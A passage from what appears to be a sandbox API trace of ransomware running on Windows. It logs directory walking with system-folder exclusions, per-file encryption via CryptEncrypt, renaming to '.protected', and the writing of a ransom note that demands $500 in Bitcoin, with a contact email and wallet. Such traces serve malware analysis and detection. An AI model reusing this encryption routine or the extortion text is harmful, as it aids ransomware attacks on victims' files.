nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0047.599] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0047.599] CloseHandle (hObject=0xb4) returned 1 [0047.843] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.protected") returned 89 [0047.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.protected")) returned 1 [0047.843] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Windows") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Program Files") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Program Files (x86)") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="$Recycle.bin") returned 1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="System Volume Information") returned -1 [0047.843] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.843] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".protected") returned 0x0 [0047.843] lstrcmpW (lpString1="ExcelMUI.xml", 
lpString2="RESTORE_FILES.txt") returned -1 [0047.843] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.843] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.843] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".txt") returned 0x0 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".rar") returned 0x0 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".zip") returned 0x0 [0047.844] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x61d, lpOverlapped=0x0) returned 1 [0047.886] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x61d, lpOverlapped=0x0) returned 1 [0047.886] 
SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0047.886] CloseHandle (hObject=0xb4) returned 1 [0047.887] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.protected") returned 89 [0047.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.protected")) returned 1 [0047.888] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0047.888] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.888] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0047.888] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0047.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.888] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0047.889] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x8f8, lpOverlapped=0x0) returned 1 [0048.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x8f8, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x8f8, lpOverlapped=0x0) returned 1 [0048.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.057] CloseHandle (hObject=0xb4) returned 1 [0048.058] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0048.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0048.058] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0048.059] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0048.059] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0048.059] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: 
"c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0048.059] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0048.059] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0048.060] lstrlenA 
(lpString="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") returned 684 [0048.060] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0048.060] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0048.060] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0048.060] CloseHandle (hObject=0xa4) returned 1 [0048.060] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0048.060] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 66 [0048.060] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0048.060] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0048.061] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 68 [0048.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0048.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0048.297] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0048.297] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0048.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.297] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0048.297] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0048.297] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.297] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.297] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.297] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0048.297] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0048.297] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0048.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0048.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.298] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0048.298] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0048.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.298] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Windows") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Program Files") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Program Files (x86)") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="$Recycle.bin") returned 1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="System Volume Information") returned -1 [0048.298] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".protected") returned 0x0 [0048.298] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0048.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".txt") returned 0x0 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".rar") returned 0x0 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".zip") returned 0x0 [0048.298] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.468] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.468] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.477] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.478] CloseHandle (hObject=0xb4) returned 1 [0048.641] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.protected") returned 94 [0048.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.protected")) returned 1 [0048.642] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Windows") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Program Files") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Program Files (x86)") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="$Recycle.bin") returned 1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="System Volume Information") returned -1 [0048.642] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".protected") returned 0x0 [0048.643] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0048.643] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.643] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.643] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: 
"c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".txt") returned 0x0 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".rar") returned 0x0 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".zip") returned 0x0 [0048.643] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0048.714] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0048.714] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, 
